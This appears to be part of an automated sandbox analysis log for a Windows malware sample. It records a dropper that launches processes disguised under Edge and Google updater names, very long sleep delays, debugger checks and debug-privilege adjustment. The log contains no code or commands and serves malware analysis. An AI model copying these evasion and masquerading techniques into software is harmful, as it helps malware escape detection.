Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Users\user\Desktop\file.exe	Memory allocated: F40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory allocated: 2990000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory allocated: F40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory allocated: 4E00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory allocated: 6E00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Memory allocated: 9E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Memory allocated: 23B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Memory allocated: 44B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Memory allocated: 49C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Memory allocated: 69C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Memory allocated: 1200000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Memory allocated: 2C20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Memory allocated: 1280000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Memory allocated: 50F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Memory allocated: 70F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Memory allocated: 2B70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Memory allocated: 2DE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Memory allocated: 2BF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Memory allocated: 5260000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Memory allocated: 7260000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Memory allocated: 1200000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Memory allocated: 2DA0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Memory allocated: 2B50000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Memory allocated: 5210000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Memory allocated: 7210000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Memory allocated: 680000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Memory allocated: 2340000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Memory allocated: 4340000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Memory allocated: 4890000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Memory allocated: 6890000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Memory allocated: A00000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Memory allocated: 25D0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Memory allocated: 2420000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Memory allocated: 4AD0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Memory allocated: 6AD0000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Window / User API: threadDelayed 5467	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Window / User API: threadDelayed 4195	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Window / User API: threadDelayed 5484	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Window / User API: threadDelayed 4333	Jump to behavior

Source: C:\Users\user\Desktop\file.exe TID: 6392	Thread sleep count: 157 > 30	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 6392	Thread sleep count: 123 > 30	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 6036	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe TID: 3004	Thread sleep count: 5467 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe TID: 3004	Thread sleep count: 4195 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe TID: 2196	Thread sleep time: -13835058055282155s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe TID: 4368	Thread sleep time: -22136092888451448s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe TID: 1456	Thread sleep count: 5484 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe TID: 1456	Thread sleep count: 4333 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe TID: 4368	Thread sleep count: 34 > 30	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File opened: C:\Users\user\AppData\Local\Temp\EdgeUpdater	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File opened: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Jump to behavior

Source: LKMService.exe, 00000002.00000002.4677000904.00000000058A0000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Process queried: DebugPort

Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe "C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe"			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Process created: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe "C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe" --checker			Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\Desktop\file.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
